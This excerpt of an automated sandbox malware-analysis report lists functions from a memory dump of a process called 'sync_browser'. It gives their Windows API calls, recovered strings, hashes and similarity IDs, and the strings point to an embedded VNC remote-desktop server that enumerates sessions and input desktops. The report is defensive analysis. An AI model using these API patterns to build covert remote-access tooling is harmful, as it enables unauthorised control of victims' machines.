Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: sprintf$CriticalInitializeSection$_errno_invalid_parameter_noinfo
String ID: 0.0.0$12-12-2002$Plugin.dsm$Someone$Unknown
API String ID: 524037307-261918508
Opcode ID: 4e3ff866f97a8194c4c278236100d924ee412cec83e3f0554b4225ebfdf1fe97
Instruction ID: 1533306b40925a972186b5f7d1cb46994c0e06c5c22365fb157ce3822c56174d
Opcode Fuzzy Hash: 4e3ff866f97a8194c4c278236100d924ee412cec83e3f0554b4225ebfdf1fe97
Instruction Fuzzy Hash: 0021CC72515B8692D705DF34E9805ECB3ACFF54F88FC84136EA4C5A6A9DF349295C320

Function 00007FF7D5956A3E Relevance: 17.8, APIs: 6, Strings: 4, Instructions: 269COMMON

Download Yara Rule

APIs

OpenInputDesktop.USER32 ref: 00007FF7D595407F
CloseDesktop.USER32 ref: 00007FF7D59540C2
CloseHandle.KERNEL32 ref: 00007FF7D5956A88
CloseHandle.KERNEL32 ref: 00007FF7D5956B01
LeaveCriticalSection.KERNEL32 ref: 00007FF7D5957BAC

Strings

vncservice.cpp : OpenInputdesktop2 NULL, xrefs: 00007FF7D5954060
vncclient.cpp : vncClientThread , xrefs: 00007FF7D5954029
vncservice.cpp : SelectDesktop , xrefs: 00007FF7D595404B
vncservice.cpp : OpenInputdesktop2 OK, xrefs: 00007FF7D595409A

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: Close$DesktopHandle$CriticalInputLeaveOpenSection
String ID: vncclient.cpp : vncClientThread $vncservice.cpp : OpenInputdesktop2 NULL$vncservice.cpp : OpenInputdesktop2 OK$vncservice.cpp : SelectDesktop
API String ID: 4065787043-3977938048
Opcode ID: 04e07c99e75fd332ae890d3068c7bd0c23d8647f6ad6a6f5c875c601342f21c4
Instruction ID: 17e4bf867a62696d990ea0c45b481f301d67bef2def1df1053d6a55dd8072551
Opcode Fuzzy Hash: 04e07c99e75fd332ae890d3068c7bd0c23d8647f6ad6a6f5c875c601342f21c4
Instruction Fuzzy Hash: 8DE1D322A086D186F794AB25C448BBEABA1EB85F98FD44236DE5C473E5CF38D451C720

Function 00007FF7D5955709 Relevance: 17.8, APIs: 3, Strings: 7, Instructions: 264COMMON

Download Yara Rule

APIs

OpenInputDesktop.USER32 ref: 00007FF7D595407F
CloseDesktop.USER32 ref: 00007FF7D59540C2

Strings

enabled, xrefs: 00007FF7D595575E
vncclient.cpp : rfbSetServerInput: inputs %s, xrefs: 00007FF7D5955777
vncservice.cpp : OpenInputdesktop2 NULL, xrefs: 00007FF7D5954060
disabled, xrefs: 00007FF7D595576C
vncservice.cpp : SelectDesktop , xrefs: 00007FF7D595404B
vncclient.cpp : vncClientThread , xrefs: 00007FF7D5954029
vncservice.cpp : OpenInputdesktop2 OK, xrefs: 00007FF7D595409A

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: Desktop$CloseInputOpen
String ID: disabled$enabled$vncclient.cpp : rfbSetServerInput: inputs %s$vncclient.cpp : vncClientThread $vncservice.cpp : OpenInputdesktop2 NULL$vncservice.cpp : OpenInputdesktop2 OK$vncservice.cpp : SelectDesktop
API String ID: 1367241101-2270697846
Opcode ID: edf9ddcd9a44aa48138f766378103f1c8a97073988da45d501d29b27bb572098
Instruction ID: 7fd7bf73d2b369b69462f9663cdad1f6a74350714ec82b31bf6c34b8549ce6f3
Opcode Fuzzy Hash: edf9ddcd9a44aa48138f766378103f1c8a97073988da45d501d29b27bb572098
Instruction Fuzzy Hash: BDD1A022A086D186EB90EB25C458BFDABA1EB85F88FD94033DE4C477A5CF39D455C720

Function 00007FF7D5941A60 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 98libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32 ref: 00007FF7D5941A9D
GetProcAddress.KERNEL32 ref: 00007FF7D5941ABA
LoadLibraryA.KERNEL32 ref: 00007FF7D5941AD7
GetProcAddress.KERNEL32 ref: 00007FF7D5941AF4
FreeLibrary.KERNEL32 ref: 00007FF7D5941B9E
FreeLibrary.KERNEL32 ref: 00007FF7D5941BAD

Strings

winlogon.exe, xrefs: 00007FF7D5941B50
WTSEnumerateProcessesA, xrefs: 00007FF7D5941AB0
WTSFreeMemory, xrefs: 00007FF7D5941AEA
wtsapi32, xrefs: 00007FF7D5941A96, 00007FF7D5941AD0

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: Library$AddressFreeLoadProc
String ID: WTSEnumerateProcessesA$WTSFreeMemory$winlogon.exe$wtsapi32
API String ID: 145871493-4162899161
Opcode ID: 0adbf5e9dd7c30560f15780b9e5a176f1c63490ee2f09b9478d032169a347fac
Instruction ID: dbf84bad0eb83bb33fb864449c55a360597b50d4863ea1e13e00ea0c5c681a41
Opcode Fuzzy Hash: 0adbf5e9dd7c30560f15780b9e5a176f1c63490ee2f09b9478d032169a347fac
Instruction Fuzzy Hash: 12417B36609B4287E664AF15A8406BDB6A4FBC5FA4FD44236DD5D03798EF38E845C320

Function 00007FF7D5942520 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 97libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32 ref: 00007FF7D5942551
GetProcAddress.KERNEL32 ref: 00007FF7D594256E
LoadLibraryA.KERNEL32 ref: 00007FF7D594258B
GetProcAddress.KERNEL32 ref: 00007FF7D59425A8
FreeLibrary.KERNEL32 ref: 00007FF7D5942658
FreeLibrary.KERNEL32 ref: 00007FF7D5942667

Strings

WTSEnumerateSessionsA, xrefs: 00007FF7D5942564
Console, xrefs: 00007FF7D5942605
WTSFreeMemory, xrefs: 00007FF7D594259E
wtsapi32, xrefs: 00007FF7D594254A, 00007FF7D5942584

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: Library$AddressFreeLoadProc
String ID: Console$WTSEnumerateSessionsA$WTSFreeMemory$wtsapi32
API String ID: 145871493-4083478734
Opcode ID: 6cf080f84c71be26cb1bfa4edcfbd06d998d32083e0e310b716d811f44676067
Instruction ID: 58dddcfe8fec2b091c49d66d615f9501da2928cc3b1ab6b3d37a540490fb1061
Opcode Fuzzy Hash: 6cf080f84c71be26cb1bfa4edcfbd06d998d32083e0e310b716d811f44676067
Instruction Fuzzy Hash: 89418E22A09B5287EB64AF55E84067EA2A4FF84F94FD80137DD5D43794DF38E844C724

Function 00007FF7D5960700 Relevance: 17.5, APIs: 9, Strings: 1, Instructions: 49threadsleepsynchronizationCOMMON

Download Yara Rule

APIs

OpenEventA.KERNEL32 ref: 00007FF7D596071E
Sleep.KERNEL32 ref: 00007FF7D596072C
IsWindow.USER32 ref: 00007FF7D5960735
GetCurrentThread.KERNEL32 ref: 00007FF7D5960744
SetThreadPriority.KERNEL32 ref: 00007FF7D596074F
WaitForSingleObject.KERNEL32 ref: 00007FF7D5960768
PostMessageA.USER32 ref: 00007FF7D5960780
IsWindow.USER32 ref: 00007FF7D5960789
CloseHandle.KERNEL32 ref: 00007FF7D59607A6

Strings

VncEvent, xrefs: 00007FF7D5960710

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: ThreadWindow$CloseCurrentEventHandleMessageObjectOpenPostPrioritySingleSleepWait
String ID: VncEvent
API String ID: 2428488660-2681191898
Opcode ID: 78b1a00b88fe3fbd3304328edc48d2619275dfc3e1a6d7d438e00feda673ce81
Instruction ID: b7c0c572739a473d66bd6dfd11db5301ba4b299474e8394dd360d38abce261f2
Opcode Fuzzy Hash: 78b1a00b88fe3fbd3304328edc48d2619275dfc3e1a6d7d438e00feda673ce81
Instruction Fuzzy Hash: E311B210E1C61647FB48BB35A958B7D9691AFCAF85FCC4032CD0E13654DF3C94458721

Function 00007FF7D59FD304 Relevance: 16.8, APIs: 11, Instructions: 254COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 00007FF7D59FD32C
_invalid_parameter_noinfo.LIBCMT ref: 00007FF7D59FD337
__wtomb_environ.LIBCMT ref: 00007FF7D59FD419
_errno.LIBCMT ref: 00007FF7D59FD422
free.LIBCMT ref: 00007FF7D59FD513
SetEnvironmentVariableA.KERNEL32 ref: 00007FF7D59FD644
_errno.LIBCMT ref: 00007FF7D59FD651
free.LIBCMT ref: 00007FF7D59FD65F
free.LIBCMT ref: 00007FF7D59FD66C
free.LIBCMT ref: 00007FF7D59FD693

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: free$_errno$EnvironmentVariable__wtomb_environ_invalid_parameter_noinfo
String ID:
API String ID: 101574016-0
Opcode ID: 181369242843f9036f05e592b74b1e6aafa5b20a9f3d11d8321f47b8ab448537
Instruction ID: 760b87e41a232bc269a00fcd5680be9510b78c79974d7daf9cd4f9e08d72c7e7
Opcode Fuzzy Hash: 181369242843f9036f05e592b74b1e6aafa5b20a9f3d11d8321f47b8ab448537
Instruction Fuzzy Hash: 73A1B961E0AB5243FA65BB25A90027DA694AF81F9CFD49636DE1D0B7C9DF3CF4418320

Function 00007FF7D59F8A7C Relevance: 16.6, APIs: 11, Instructions: 83COMMON

Download Yara Rule

APIs

GetFullPathNameA.KERNEL32 ref: 00007FF7D59F8ABB
GetLastError.KERNEL32 ref: 00007FF7D59F8AC5
_errno.LIBCMT ref: 00007FF7D59F8AEB
calloc.LIBCMT ref: 00007FF7D59F8B00
_errno.LIBCMT ref: 00007FF7D59F8B0D
_errno.LIBCMT ref: 00007FF7D59F8B1F
_invalid_parameter_noinfo.LIBCMT ref: 00007FF7D59F8B2A
GetFullPathNameA.KERNEL32 ref: 00007FF7D59F8B41
free.LIBCMT ref: 00007FF7D59F8B56
_errno.LIBCMT ref: 00007FF7D59F8B5B
free.LIBCMT ref: 00007FF7D59F8B7B

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: _errno$FullNamePathfree$ErrorLast_invalid_parameter_noinfocalloc
String ID:
API String ID: 3219262609-0
Opcode ID: bfbee9e4b5986560eceb10190c14978969bf0a457ba4f53162cbca2fe3e34832
Instruction ID: 7389bda394e73b18e2748741462033d428455a810187bb9fbf3176105f7db92e
Opcode Fuzzy Hash: bfbee9e4b5986560eceb10190c14978969bf0a457ba4f53162cbca2fe3e34832
Instruction Fuzzy Hash: C431AD62E4D65287FA957A61640427DA294AF81F98FD84833ED5E47BCADF3CE4428330

Function 00007FF7D595D930 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 85libraryloaderCOMMON

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32 ref: 00007FF7D595D95E

Part of subcall function 00007FF7D59C79A0: EnterCriticalSection.KERNEL32 ref: 00007FF7D59C79C7
Part of subcall function 00007FF7D59C79A0: LeaveCriticalSection.KERNEL32 ref: 00007FF7D59C79E9
Part of subcall function 00007FF7D59C79A0: CreateSemaphoreA.KERNEL32 ref: 00007FF7D59C7A03
Part of subcall function 00007FF7D59C79A0: GetLastError.KERNEL32 ref: 00007FF7D59C7A15

Part of subcall function 00007FF7D593D9D0: OpenFileMappingA.KERNEL32 ref: 00007FF7D593DA07
Part of subcall function 00007FF7D593D9D0: MapViewOfFile.KERNEL32 ref: 00007FF7D593DA2D

InitializeCriticalSection.KERNEL32 ref: 00007FF7D595D9EB

Part of subcall function 00007FF7D5934680: InitializeCriticalSection.KERNEL32 ref: 00007FF7D59346A0
Part of subcall function 00007FF7D5934680: GetModuleHandleA.KERNEL32 ref: 00007FF7D59346C5
Part of subcall function 00007FF7D5934680: GetProcAddress.KERNEL32 ref: 00007FF7D59346DA
Part of subcall function 00007FF7D5934680: GetModuleHandleA.KERNEL32 ref: 00007FF7D59346F2
Part of subcall function 00007FF7D5934680: GetProcAddress.KERNEL32 ref: 00007FF7D5934707
Part of subcall function 00007FF7D5934680: GetTickCount.KERNEL32 ref: 00007FF7D593475E

LoadLibraryA.KERNEL32 ref: 00007FF7D595DA0D
GetProcAddress.KERNEL32 ref: 00007FF7D595DA30
LoadLibraryA.KERNEL32 ref: 00007FF7D595DA51
GetProcAddress.KERNEL32 ref: 00007FF7D595DA6D

Strings

ChangeWindowMessageFilter, xrefs: 00007FF7D595DA63
GetCursorInfo, xrefs: 00007FF7D595DA26
user32.dll, xrefs: 00007FF7D595DA06, 00007FF7D595DA4A

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: CriticalSection$AddressProc$Initialize$FileHandleLibraryLoadModule$CountCreateEnterErrorLastLeaveMappingOpenSemaphoreTickView
String ID: ChangeWindowMessageFilter$GetCursorInfo$user32.dll
API String ID: 173432231-678763868
Opcode ID: faf61d6d44ca246d6e556e1dfbdb385b5274f0d62226512dde9a94f323da9ec3
Instruction ID: 7ae6f52fde503bcb71f16b2a15ea85e3f513124274727e11f79ecb0af977f587
Opcode Fuzzy Hash: faf61d6d44ca246d6e556e1dfbdb385b5274f0d62226512dde9a94f323da9ec3
Instruction Fuzzy Hash: 1D411B32619B91A7E64CAB24E9406EDB7A8FF84B54FC04136DAAD03794DF7CA4B5C310

Function 00007FF7D5936A20 Relevance: 15.8, APIs: 3, Strings: 6, Instructions: 78registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32 ref: 00007FF7D5936A65
RegQueryValueExA.ADVAPI32 ref: 00007FF7D5936AA1
RegCloseKey.ADVAPI32 ref: 00007FF7D5936B6A

Strings

System\CurrentControlSet\Control\ProductOptions, xrefs: 00007FF7D5936A49
WinNT, xrefs: 00007FF7D5936B4A
LANMANNT, xrefs: 00007FF7D5936AAF
LANSECNT, xrefs: 00007FF7D5936AC8, 00007FF7D5936B22
ProductType, xrefs: 00007FF7D5936A7D
SERVERNT, xrefs: 00007FF7D5936B01

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: CloseOpenQueryValue
String ID: LANMANNT$LANSECNT$ProductType$SERVERNT$System\CurrentControlSet\Control\ProductOptions$WinNT
API String ID: 3677997916-356703426
Opcode ID: 88216def6c21df696fe551fc804dfdd3315c8a7ded965229e51908db5a4eccae
Instruction ID: 8d8d158193c13090a439e25d802cd03a0bcd99910e3c6e50970922e84ca6c670
Opcode Fuzzy Hash: 88216def6c21df696fe551fc804dfdd3315c8a7ded965229e51908db5a4eccae
Instruction Fuzzy Hash: 44414D32A1C64282FB60AB20E4447AEBAA4FF84B4CFC45032DE6D87559EF3CD515CB24

Function 00007FF7D59368F0 Relevance: 15.8, APIs: 3, Strings: 6, Instructions: 62registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32 ref: 00007FF7D593692F
RegQueryValueExA.ADVAPI32 ref: 00007FF7D593696B
RegCloseKey.ADVAPI32 ref: 00007FF7D5936A00

Strings

Uniprocessor Free, xrefs: 00007FF7D5936979
CurrentType, xrefs: 00007FF7D5936947
Multiprocessor Checked, xrefs: 00007FF7D59369DC
Uniprocessor Checked, xrefs: 00007FF7D593699A
Multiprocessor Free, xrefs: 00007FF7D59369BB
SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 00007FF7D5936913

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: CloseOpenQueryValue
String ID: CurrentType$Multiprocessor Checked$Multiprocessor Free$SOFTWARE\Microsoft\Windows NT\CurrentVersion$Uniprocessor Checked$Uniprocessor Free
API String ID: 3677997916-1370392681
Opcode ID: 127efd2f4bb2d730ad2ffcadb57483ca5e65c2607e8512af785212c1471c3a0c
Instruction ID: bca54bdfeb175371eb47ca96d49a61ab1afce13cc7fb8eeca5b1cf1409863b99
Opcode Fuzzy Hash: 127efd2f4bb2d730ad2ffcadb57483ca5e65c2607e8512af785212c1471c3a0c
Instruction Fuzzy Hash: A5314171A18A4382FB50AB25E444BADB7A4FF85B4CFC01132DE9D4A599EF3CD505CB60

Function 00007FF7D59607C0 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 60windowCOMMON

Download Yara Rule

APIs

CreateDIBSection.GDI32 ref: 00007FF7D5960812
CreateCompatibleBitmap.GDI32 ref: 00007FF7D5960851
GetLastError.KERNEL32(?,?,?,?,00000000,00007FF7D595F2A3), ref: 00007FF7D596085F
DeleteObject.GDI32 ref: 00007FF7D59608AF

Strings

